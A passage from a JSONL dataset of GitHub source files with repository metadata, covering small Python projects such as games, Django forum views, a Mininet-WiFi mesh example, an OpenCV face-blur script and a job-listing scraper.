== 0:\n yc.append(scores[i] + yc[-1])\n else:\n oc.append(scores[i] + oc[-1])\n x = []\n for i in range(len(yc)):\n if yc[i] == oc[i]:\n x.append('T')\n elif yc[i] > oc[i]:\n x.append('Y')\n else:\n x.append('O')\n return x\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"epMcaSNzBFSF5uB89_9.py","file_name":"epMcaSNzBFSF5uB89_9.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74170116571","text":"from collections import Counter\r\n\r\nN = int(input())\r\nplayer = []\r\nresult = []\r\ncnt = 0\r\n\r\nfor i in range(N):\r\n name = input()\r\n player.append(name[0]) # 맨 앞 글자만 필요하다\r\n\r\n# Counter로 앞 글자 개수 세기\r\nplayer_count = Counter(player)\r\n\r\nfor i, j in player_count.items():\r\n if j >= 5:\r\n result.append(i)\r\n cnt += 1\r\n\r\nresult.sort()\r\n\r\nif cnt == 0:\r\n print('PREDAJA')\r\nelse:\r\n for i in result:\r\n print(i, end='')\r\n","repo_name":"JangGiWon/Beakjoon","sub_path":"1159.py","file_name":"1159.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6542502931","text":"#! /usr/bin/env\nfrom __future__ import print_function\nprint('Tic-Tac-Toe\\n\\n')\nprevMoves = []\n# The board is composed of lists\nboard = [[' ','|',' ','|',' '],['-','+','-','+','-'],[' ','|',' ','|',' '],['-','+','-','+','-'],[' ','|',' ','|',' ']]\n\n\ndef printBoard():\n for i in board:\n for x in i:\n print(x,end=\"\") # I print the board every attempted turn\n print()\n\ndef getPlayer():\n if len(prevMoves)%2 == 0: # This ensures the first player is 'x', and that it swaps every successful turn\n player = 'x'\n else:\n player = 'o'\n return player\n\ndef getEntry(): # Gets the user's entry and writes it to the board\n player = getPlayer()\n\n row = 0 # These two while statements take only an int input\n while row < 1 or row > 3:\n row = int(input('Row(1-3): '))\n print()\n column = 0\n while column < 1 or column > 3:\n column = int(input('Column(1-3): '))\n\n # Lines 32-44 convert the input into their corresponding indexes\n if row == 1:\n row = 0\n elif row == 2:\n row = 2\n elif row == 3:\n row = 4\n\n if column == 1:\n column = 0\n elif column == 2:\n column = 2\n elif column == 3:\n column = 4 \n # The rest of the function determines whether the chosen spot has been taken yet, and prints if so\n taken = False\n i = 0\n while taken == False and i < len(prevMoves): # Terms to exit require the spot be taken,\n # or the index have exceeded the list\n if prevMoves[i] == [row,column]:\n print('That spot is already taken. Please try again')\n taken = True\n i += 1\n # If the spot is available, the player will be written to the board, and the move will be logged\n if taken == False:\n prevMoves.append([row,column])\n board[row][column] = player\n # Hello there\n print()\n\n\ndef getWinner():\n # Determines the winner or lack thereof\n player = getPlayer()\n if player == 'x':\n player = 'o'\n else:\n player = 'x'\n if board[0][0] == player and board[0][2] == player and board[0][4] == player:\n return player\n elif board[2][0] == player and board[2][2] == player and board[2][4] == player:\n return player\n elif board[4][0] == player and board[4][2] == player and board[4][4] == player:\n return player\n elif board[0][0] == player and board[2][0] == player and board[4][0] == player:\n return player\n elif board[0][2] == player and board[2][2] == player and board[4][2] == player:\n return player\n elif board[0][4] == player and board[2][4] == player and board[4][4] == player:\n return player\n elif board[0][0] == player and board[2][2] == player and board[4][4] == player:\n return player\n elif board[4][0] == player and board[2][2] == player and board[0][4] == player:\n return player\n \n print()\n return 'nobody'\n\n\ndef main():\n i = -1\n while getWinner() == 'nobody' and len(prevMoves) < 9:\n #player = getPlayer()\n i += 1\n printBoard()\n getEntry()\n getWinner()\n\n printBoard()\n print(getWinner(),'wins!')\n input('ENTER to exit: ')\n\nif __name__ == '__main__':\n main()\n","repo_name":"oliviasolis/portfolio","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19284704752","text":"from server.Ship import *\nfrom random import randrange, choice\n\n\n# класс описывающий игрока и его поведение\nclass Player:\n def __init__(self):\n self.ships = [] # флот игрока\n self.fleet_coord = [] # координаты флота игрока\n self.battlefield = [[0 for _ in range(10)] for _ in range(10)] # игровое поле игрока(0 - пустая клетка)\n self.shoots = [] # список координат произведенных выстрелов\n self.ships_create() # создание флота\n\n def __str__(self):\n return f'{self.ships} {self.battlefield} {self.fleet_coord}'\n\n # метод внесения изменений в игровое поле игрока\n # помечает точки из coord_list меткой\n # status(1 - целая точка, 2 - подбитая точка\\потопленный корабль, точки вокруг коробля)\n def battlefield_change(self, coord_list, status):\n for coord in coord_list:\n battlefield_row, battlefield_column = coord\n self.battlefield[battlefield_row][battlefield_column] = status\n\n # метод, создающий флот игрока\n def ships_create(self):\n # создаем корабли, пока их не станет 10\n ships_counter = 0\n while ships_counter < 10:\n # при неудачной попытке начинаем сначала\n self.ships = []\n self.battlefield = [[0 for _ in range(10)] for _ in range(10)]\n self.fleet_coord = []\n ships_counter = 0\n # цикл по длине кораблей\n for length in range(4, 0, -1):\n # количество кораблей в зависимости от длины\n for i in range(5 - length):\n # количество попыток создания корабля\n try_number = 0\n while True:\n try_number += 1\n # пробуем 50 раз, не получилось - начинаем сначала\n if try_number > 50:\n break\n # выбираем случайную стартовую точку и ориентацию\n start_point = (randrange(10), randrange(10))\n orientation = randrange(2)\n # создаем корабль и проверяем, чтобы он не пересекался с другими\n ship = Ship(length, orientation, start_point)\n ships_crossing = list(set(self.fleet_coord) & set(ship.ship_coord))\n # если все успешно, добавляем корабль и его координаты во флот, изменяем разметку поля\n if ship.correct_create and not ships_crossing:\n self.fleet_coord += ship.ship_coord + ship.ship_around\n self.ships.append(ship)\n ships_counter += 1\n self.battlefield_change(ship.ship_coord, 1)\n break\n\n # выстрел по врагу, передаем объект Player, по которому стреляем, и координаты выстрела\n # метод возвращает статус выстрела и список измененных точек\n def shoot(self, enemy, coord):\n # статус выстрела (0- мимо, 1 - попал, 2 - убил)\n shoot_status = 0\n self.shoots.append(coord)\n # проверяем наличие координаты выстрела в координатах короблей противника\n for ship in enemy.ships:\n # если попали, меняем статус точки корабля на \"подбито\"\n if coord in ship.ship_coord:\n ship_peace_index = ship.ship_coord.index(coord)\n ship.ship_status[ship_peace_index] = 0\n # если остались целые точки, то \"попал\"\n if 1 in ship.ship_status:\n shoot_status = 1\n enemy.battlefield[coord[0]][coord[1]] = 3\n return shoot_status, [coord]\n # если нет, то \"убил\", добавляем окуржение корабля в спсиок вытсрелов, чтобы не стрелять туда\n else:\n shoot_status = 2\n ship.alive = False\n self.shoots += ship.ship_around\n enemy.battlefield[coord[0]][coord[1]] = 3\n enemy.battlefield_change(ship.ship_around, 2)\n return shoot_status, ship.ship_around\n enemy.battlefield[coord[0]][coord[1]] = 2\n return shoot_status, []\n\n # метод проверки проигрыша, возвращает True если остались живые корабли, иначе False\n def check_finish(self):\n alive_counter = 0\n for ship in self.ships:\n if ship.alive:\n alive_counter += 1\n if alive_counter:\n return True\n return False\n\n\n# класс ИИ компьютера, наследуется от Player\n# доаолняет логику игрока выбором точки выстрела\nclass AIPlayer(Player):\n def __init__(self):\n super().__init__()\n self.hits = [] # список удачных выстрелов\n\n # метод выбора точки выстрела, возвращает координаты выстрела\n def coord_select(self):\n # если успешных выстрелов нет, то выбираем рандомную точку, в которую еще не стреляли\n if not self.hits:\n while True:\n random_point = (randrange(10), randrange(10))\n if random_point not in self.shoots:\n break\n # если был один успешный выстрел, то случайно выбираем одну из соседних 4 точек\n elif len(self.hits) == 1:\n neighbor_points = []\n previous_point_row, previous_point_column = self.hits[0]\n for i in range(previous_point_row - 1, previous_point_row + 2):\n for j in range(previous_point_column - 1, previous_point_column + 2):\n if (0 <= i <= 9 and 0 <= j <= 9 and\n (i == previous_point_row or j == previous_point_column)\n and not (i == previous_point_row and j == previous_point_column)\n and ((i, j) not in self.shoots)):\n neighbor_points.append((i, j))\n random_point = choice(neighbor_points)\n else:\n # если было больше одного удачного выстрела, то случайно выбираем из 2 крайних точек\n neighbor_points = []\n # если у точек общая строка, выбираем минимальный номер столбца и рассматриваем точки левее и правее\n if self.hits[0][0] == self.hits[1][0]:\n min_column = min(list(zip(*self.hits))[1])\n if min_column - 1 >= 0:\n neighbor_points.append((self.hits[0][0], min_column - 1))\n if min_column + len(self.hits) <= 9:\n neighbor_points.append((self.hits[0][0], min_column + len(self.hits)))\n # если общий столбец, выбираем минимальный номер строки и рассматриваем точки выше и ниже\n else:\n min_row = min(list(zip(*self.hits))[0])\n if min_row - 1 >= 0:\n neighbor_points.append((min_row - 1, self.hits[0][1]))\n if min_row + len(self.hits) <= 9:\n neighbor_points.append((min_row + len(self.hits), self.hits[0][1]))\n while True:\n random_point = choice(neighbor_points)\n if random_point not in self.shoots:\n break\n return random_point\n","repo_name":"TonyNewbie/Battleship","sub_path":"battleship_server/server/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":8697,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21724451450","text":"from django import forms\n\nfrom celery.execute import send_task\n\nfrom viperdb.models import Virus, Layer, Entity, Family\nfrom viperdb.helpers import get_pdb_info\n\n\n\n\n\nclass InitialVirusForm(forms.Form):\n def __init__(self, *args, **kwargs):\n kwargs.update({\"initial\":{\"file_source\": 1}})\n super(InitialVirusForm, self).__init__(*args, **kwargs)\n for key, field in self.fields.iteritems():\n if field.required:\n field.widget.attrs.update({'class':'required'})\n FILE_REMOTE = 1\n FILE_LOCAL = 2\n FILE_UPLOAD = 3\n FILE_SOURCE_CHOICES = ((FILE_REMOTE, 'Use up-to-date PDB and CIF files from RCSB'),\n (FILE_LOCAL, 'Use existing PDB and CIF files on VIPERdb'),)\n # (FILE_UPLOAD, 'Upload your own PDB and CIF files to VIPERdb'))\n \n entry_id = forms.CharField(max_length=8)\n file_source = forms.ChoiceField(widget=forms.RadioSelect, choices=FILE_SOURCE_CHOICES)\n # pdb_file_upload = forms.FileField(required=False)\n # cif_file_upload = forms.FileField(required=False)\n\n def clean(self):\n file_source = int(self.cleaned_data[\"file_source\"])\n entry_id= self.cleaned_data[\"entry_id\"]\n\n if file_source == self.FILE_REMOTE:\n if not get_pdb_info(entry_id):\n raise forms.ValidationError(\"PDB id does not exist in RCSB.\")\n elif file_source == self.FILE_LOCAL:\n task = send_task('virus.check_file_count', args=[entry_id])\n\n if task.get() is not 2: \n raise forms.ValidationError(\"PDB and/or CIF file not found locally.\")\n elif file_source == self.FILE_UPLOAD:\n pass\n\n return self.cleaned_data\n\n\nclass VirusForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(VirusForm, self).__init__(*args, **kwargs)\n self.fields[\"family\"].queryset = Family.objects.order_by('name')\n self.fields[\"deposition_date\"] = forms.DateField(input_formats=[\"%m-%d-%Y\"]) \n for key, field in self.fields.iteritems():\n if field.required:\n field.widget.attrs.update({'class':'required'})\n\n class Meta:\n model = Virus\n widgets = {}\n exclude = ['entry_key', 'prepared', 'layer_count']\n\n def clean(self):\n return self.cleaned_data\n\n\n\nclass LayerForm(forms.ModelForm):\n def __init__(self, entry_key, *args, **kwargs):\n super(LayerForm, self).__init__(*args, **kwargs)\n self.fields['entities'] = forms.ModelMultipleChoiceField(\n queryset=Entity.objects.filter(entry_key=entry_key, \n type='polymer'),\n widget=forms.CheckboxSelectMultiple,\n )\n for key, field in self.fields.iteritems():\n if field.required:\n field.widget.attrs.update({'class':'required'})\n\n class Meta:\n model = Layer\n exclude = ['entry_key', 'layer_id', 'entry_id', \"min_diameter\", \"ave_diameter\", \"max_diameter\"]\n\n def clean(self):\n return self.cleaned_data\n\nclass MatrixChoiceForm(forms.Form):\n MTX_VIPERIZE = 1\n MTX_INPUT = 2\n MTX_UNIT = 3\n MATRIX_CHOICES = ((MTX_VIPERIZE,'Use viperize to generate PDB to VIPER matrix'),\n (MTX_INPUT, 'Input your own matrix'),\n (MTX_UNIT, 'Use Unix Matrix'))\n \n matrix_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=MATRIX_CHOICES)\n\nclass ChainForm(forms.Form):\n def __init__(self, *args, **kwargs):\n kwargs.update({\"initial\":{\"chain_selection\": 1}})\n kwargs.update({\"empty_permitted\":False})\n super(ChainForm, self).__init__(*args,**kwargs)\n\n chain_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=Virus.CHAIN_CHOICES)\n chain_input = forms.CharField(max_length=2, required=False)\n\nclass MoveChainForm(forms.Form):\n def __init__(self, *args, **kwargs):\n kwargs.update({\"initial\":{\"move_selection\": 1}})\n super(MoveChainForm, self).__init__(*args, **kwargs)\n\n MOVE_NONE = 1\n MOVE_ALL = 2\n move_choices = ((MOVE_NONE, \"Move none\"), (MOVE_ALL, \"Move all chains\"))\n move_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=move_choices)\n matrix_selection = forms.IntegerField(min_value=1, max_value=60, required=False)\n\nclass ImageAnalysisForm(forms.Form):\n def __init__(self, *args, **kwargs):\n kwargs.update({\"initial\":{\"analysis_selection\": 1}})\n super(ImageAnalysisForm, self).__init__(*args, **kwargs)\n\n BOTH_IMAGE_AND_ANALYSIS = 1\n ANALYSIS_ONLY = 2\n IMAGE_ONLY = 3\n NO_ACTION = 4\n\n analysis_choices = (\n (BOTH_IMAGE_AND_ANALYSIS, \"Perform analysis and generate images.\"),\n (ANALYSIS_ONLY, \"Perform analysis only.\"),\n (IMAGE_ONLY, \"Generate images only.\"),\n (NO_ACTION, \"Do nothing.\")\n )\n analysis_selection = forms.ChoiceField(widget=forms.RadioSelect, \n choices=analysis_choices)\n\n\n","repo_name":"TSRI/viperdb3","sub_path":"app/viperdb/forms/add_entry.py","file_name":"add_entry.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42161634898","text":"from db_factory import DB_Factory\n\ndb = DB_Factory()\n\n#raw_list_training = db.foulcommits_training_data()\ndatax = db.foulcommits_data()\ndatay = db.foulcommits_data_card()\n\n\n\n#print(str(raw_list_test[0]))\n\noutput = open('datax.txt', 'w')\nfor data in datax:\n output.writelines(str(data))\n output.write(\"\\n\")\noutput.close()\n\noutput2 = open('datay.txt', 'w')\nfor data in datay:\n output2.writelines(str(data))\n output2.write(\"\\n\")\noutput.close()\n\n\n\n\ndb.close","repo_name":"Eli-Anderson/SoccerHeatmap","sub_path":"backend/ml_pull_db_data.py","file_name":"ml_pull_db_data.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42456485793","text":"#!/usr/bin/env python\n\n\"\"\"\nThis example shows on how to enable the mesh mode\nThe wireless mesh network is based on IEEE 802.11s\n\"\"\"\n\nimport sys\n\nfrom mininet.log import setLogLevel, info\nfrom mn_wifi.link import wmediumd, mesh\nfrom mn_wifi.cli import CLI\nfrom mn_wifi.net import Mininet_wifi\nfrom mn_wifi.wmediumdConnector import interference\n\n\ndef topology(mobility):\n \"Create a network.\"\n net = Mininet_wifi(link=wmediumd, wmediumd_mode=interference)\n\n info(\"*** Creating nodes\\n\")\n if mobility:\n sta1 = net.addStation('sta1')\n sta2 = net.addStation('sta2')\n sta3 = net.addStation('sta3')\n else:\n sta1 = net.addStation('sta1', position='10,10,0')\n sta2 = net.addStation('sta2', position='50,10,0')\n sta3 = net.addStation('sta3', position='90,10,0')\n\n info(\"*** Configuring Propagation Model\\n\")\n net.setPropagationModel(model=\"logDistance\", exp=4)\n\n info(\"*** Configuring nodes\\n\")\n net.configureNodes()\n\n info(\"*** Creating links\\n\")\n net.addLink(sta1, cls=mesh, ssid='meshNet',\n intf='sta1-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n net.addLink(sta2, cls=mesh, ssid='meshNet',\n intf='sta2-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n net.addLink(sta3, cls=mesh, ssid='meshNet',\n intf='sta3-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n\n if mobility:\n net.plotGraph(max_x=100, max_y=100)\n net.setMobilityModel(time=0, model='RandomDirection',\n max_x=100, max_y=100,\n min_v=0.5, max_v=0.8, seed=20)\n\n info(\"*** Starting network\\n\")\n net.build()\n\n info(\"*** Running CLI\\n\")\n CLI(net)\n\n info(\"*** Stopping network\\n\")\n net.stop()\n\n\nif __name__ == '__main__':\n setLogLevel('info')\n mobility = True if '-m' in sys.argv else False\n topology(mobility)\n","repo_name":"intrig-unicamp/mininet-wifi","sub_path":"examples/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":391,"dataset":"github-code","pt":"32"} +{"seq_id":"29589083308","text":"import cv2\r\n\r\ncascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\ndef find_and_blur(bw, color): \r\n # detect al faces\r\n faces = cascade.detectMultiScale(bw, 1.1, 4)\r\n # get the locations of the faces\r\n for (x, y, w, h) in faces:\r\n # select the areas where the face was found\r\n roi_color = color[y:y+h, x:x+w]\r\n # blur the colored image\r\n blur = cv2.GaussianBlur(roi_color, (101,101), 0)\r\n # Insert ROI back into image\r\n color[y:y+h, x:x+w] = blur \r\n \r\n # return the blurred image\r\n return color\r\n\r\n# turn camera on\r\nimage_capture = cv2.imread('test.jpg')\r\n\r\nwhile True:\r\n # get the picture\r\n \r\n # transform color -> grayscale\r\n bw = cv2.cvtColor(image_capture, cv2.COLOR_BGR2GRAY)\r\n # detect the face and blur it\r\n blur = find_and_blur(bw, image_capture)\r\n # display the blur output\r\n cv2.imshow('Image', blur)\r\n # break if q is pressed\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# turn camera off \r\nimage_capture.release()\r\ncv2.waitKey()\r\n ","repo_name":"ADITYANMOHANTY/FACE-BLUR-SYSTEM-USING-OPENCV-PYTHON","sub_path":"blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17617636428","text":"\"\"\"Basic IO utils.\n\"\"\"\n\nimport os\nimport ujson as json\nimport cPickle as pickle\n\ndef create_path(path):\n dirname = os.path.dirname(path)\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\ndef read_json(path):\n try:\n return json.load(open(path))\n except:\n raise Exception('Error reading JSON from %s' % path)\n\ndef write_json(raw, path, ensure_path=False):\n if ensure_path:\n create_path(path)\n with open(path, 'w') as out:\n print >>out, json.dumps(raw)\n\ndef read_pickle(path):\n with open(path, 'rb') as fin:\n return pickle.load(fin)\n\ndef write_pickle(obj, path, ensure_path=False):\n if ensure_path:\n create_path(path)\n with open(path, 'wb') as fout:\n pickle.dump(obj, fout)\n\n","repo_name":"stanfordnlp/cocoa","sub_path":"cocoa/io/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"32"} +{"seq_id":"11860912863","text":"#from _typeshed import Self\nfrom django import db\nfrom django.shortcuts import render\nfrom .models import Forum_post, Home_page\nfrom .forms import FilterForm\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import (\n #ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView,\n)\n\n\ndef home(request):\n if request.user.is_authenticated:\n items_in_page_tmp = request.user.profile.items_in_page\n db_data = Home_page.objects.all().order_by('-date_posted')\n else:\n items_in_page_tmp = 10\n db_data = Home_page.objects.filter(public_post = True).order_by('-date_posted')\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Home',\n 'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/home.html', dic_x)\n\n\n@login_required\ndef index(request):\n dic_x = {}\n filter_url_tmp = ''\n filter_url = ''\n filter_url_org = request.get_full_path()\n position = filter_url_org.rfind('?')\n filter_url_org1 = '&' + filter_url_org[position:]\n if request.user.is_authenticated:\n filter_tmp = request.GET.get('title_filter')\n if filter_tmp != None:\n filter_str = filter_tmp\n filter_url_tmp = (filter_url_org1.replace('?', ''))\n position2 = filter_url_tmp.rfind('&')\n if position > 0:\n filter_url = filter_url_tmp[position2:]\n else:\n filter_url = filter_url_tmp\n else:\n filter_str = ''\n filter_obj = FilterForm(request.GET or None)\n list_rows_tmp = request.user.profile.list_rows\n if list_rows_tmp > 0:\n list_rows_int = list_rows_tmp\n else:\n list_rows_int = 1\n if list_rows_tmp > 100:\n list_rows_int = 100\n db_data = Forum_post.objects.filter(title__icontains = filter_str).order_by('-date_posted')\n paginator = Paginator(db_data, list_rows_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum index',\n 'title_page': 'Simple message board',\n 'posts': page_data,\n 'filter': filter_obj,\n 'filter_url_str' : filter_url\n }\n return render(request, 'forum/index.html', dic_x)\n\n\n@login_required\ndef latest_topics(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.filter(origin_post_id = 0).order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest topics',\n 'title_page' : 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\n@login_required\ndef latest_comments(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.exclude(origin_post_id = 0).order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest comments',\n 'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\n@login_required\ndef latest_all(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.all().order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest all',\n 'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\nclass AllDetailView(LoginRequiredMixin, DetailView): #Show one post\n model = Forum_post\n template_name = 'forum/oneview.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum one post'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass ThreadDetailView(LoginRequiredMixin, DetailView): #Show post thread\n model = Forum_post\n template_name = 'forum/itemview.html'\n\n def get_context_data(self, **kwargs):\n items_in_page_tmp = self.request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n context = super().get_context_data(**kwargs)\n db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n if db_data['origin_post_id'] == 0:\n post_id = db_data['id']\n else:\n post_id = db_data['origin_post_id']\n db_data = Forum_post.objects.filter(Q(id = post_id) | Q(origin_post_id = post_id)).order_by('date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = self.request.GET.get('page')\n page_data = paginator.get_page(page_number)\n context['posts'] = page_data\n context['title'] = 'Forum message thread'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView): #Show selected user information\n model = Forum_post\n template_name = 'forum/user_info.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'User info'\n return context\n\n\nclass UserHomeDetailView(LoginRequiredMixin, DetailView): #Show selected home user information\n model = Home_page\n template_name = 'forum/user_info.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum user info'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass TopicCreateView(LoginRequiredMixin, CreateView):\n model = Forum_post\n success_url = reverse_lazy('forum-latest_topics')\n fields = ['title', 'content']\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum new topic'\n context['title_page'] = 'Simple message board'\n return context\n\n def get_template_names(self):\n if self.request.user.profile.user_level > 3:\n template_name = 'forum/topic_new.html'\n else:\n template_name = 'forum/forbidden.html'\n return template_name\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n form.instance.author_name = str(self.request.user)\n form.instance.author_nickname = self.request.user.profile.nickname\n form.instance.post_type = 'Topic'\n messages.add_message(self.request, messages.INFO, 'Yours new topic has been saved!')\n return super().form_valid(form)\n\n\nclass CommentCreateView(LoginRequiredMixin, CreateView):\n model = Forum_post\n success_url = reverse_lazy('forum-latest_comments')\n fields = ['content']\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['topic_context'] = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n context['title'] = 'Forum new comment'\n context['title_page'] = 'Simple message board'\n return context\n\n def get_template_names(self):\n if self.request.user.profile.user_level > 3:\n template_name = 'forum/comment_new.html'\n else:\n template_name = 'forum/forbidden.html'\n return template_name\n\n def form_valid(self, form):\n db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n form.instance.author = self.request.user\n form.instance.author_name = str(self.request.user)\n form.instance.author_nickname = self.request.user.profile.nickname\n form.instance.post_type = 'Comment'\n form.instance.title = 'Re: ' + db_data['title']\n if db_data['origin_post_id'] == 0:\n form.instance.origin_post_id = db_data['id']\n else:\n form.instance.origin_post_id = db_data['origin_post_id']\n info = 'Yours new comment to '+ db_data['title']+ ' has been saved!'\n messages.add_message(self.request, messages.INFO, info)\n return super().form_valid(form)\n\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Forum_post\n success_url = reverse_lazy('forum-latest_all')\n fields = ['content']\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum edit post'\n context['title_page'] = 'Simple message board'\n return context\n\n def get_template_names(self):\n if self.request.user.profile.user_level > 3:\n template_name = 'forum/edit_all.html'\n else:\n template_name = 'forum/forbidden.html'\n return template_name\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n origin_post_id = db_data['origin_post_id']\n if origin_post_id == 0:\n form.instance.post_type = 'Topic[edit]'\n else:\n form.instance.post_type = 'Comment[edit]' \n info = 'Post '+ db_data['title']+ ' has been updated!'\n messages.add_message(self.request, messages.INFO, info)\n return super().form_valid(form)\n\n def test_func(self):\n Forum_post = self.get_object()\n if self.request.user == Forum_post.author:\n return True\n return False\n\n\nclass PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Forum_post\n success_url = reverse_lazy('forum-latest_all')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum delete post'\n context['title_page'] = 'Simple message board'\n return context\n\n def test_func(self):\n Forum_post = self.get_object()\n if self.request.user == Forum_post.author and self.request.user.profile.user_level > 4:\n return True\n return False ","repo_name":"hann1010/simple_message_board","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20829133441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 6 13:44:03 2023\r\n\r\n@author: Vighneshwar\r\n\"\"\"\r\n\r\nimport requests \r\nfrom selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport pandas as pd\r\n\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\n\r\nurl = \"https://www.naukri.com/tableau-jobs?k=tableau&ctcFilter=25to50&ctcFilter=50to75\"\r\npage = requests.get(url)\r\npage.text\r\n\r\ndriver = webdriver.Chrome(ChromeDriverManager().install())\r\ndriver.get(url)\r\n\r\ntime.sleep(10)\r\n\r\nsoup = BeautifulSoup(driver.page_source,'html5lib')\r\n\r\ndriver.close\r\n\r\noutput_dataframe = pd.DataFrame(columns=['Title','Company','Ratings','Reviews',\r\n 'Experience','Salary','Location',\r\n 'Job_Post_History','URL'])\r\nresults = soup.find(class_ =\"list\")\r\njob_elements = results.find_all('article',class_ = 'jobTuple')\r\n\r\n\r\nfor job_elem in job_elements:\r\n #URL for the job\r\n URL = job_elem.find('a',class_='title ellipsis').get('href')\r\n \r\n #Title of the job \r\n Title = job_elem.find('a',class_= 'title ellipsis').text\r\n \r\n \r\n #name of the company \r\n Company = job_elem.find('a',class_= 'subTitle 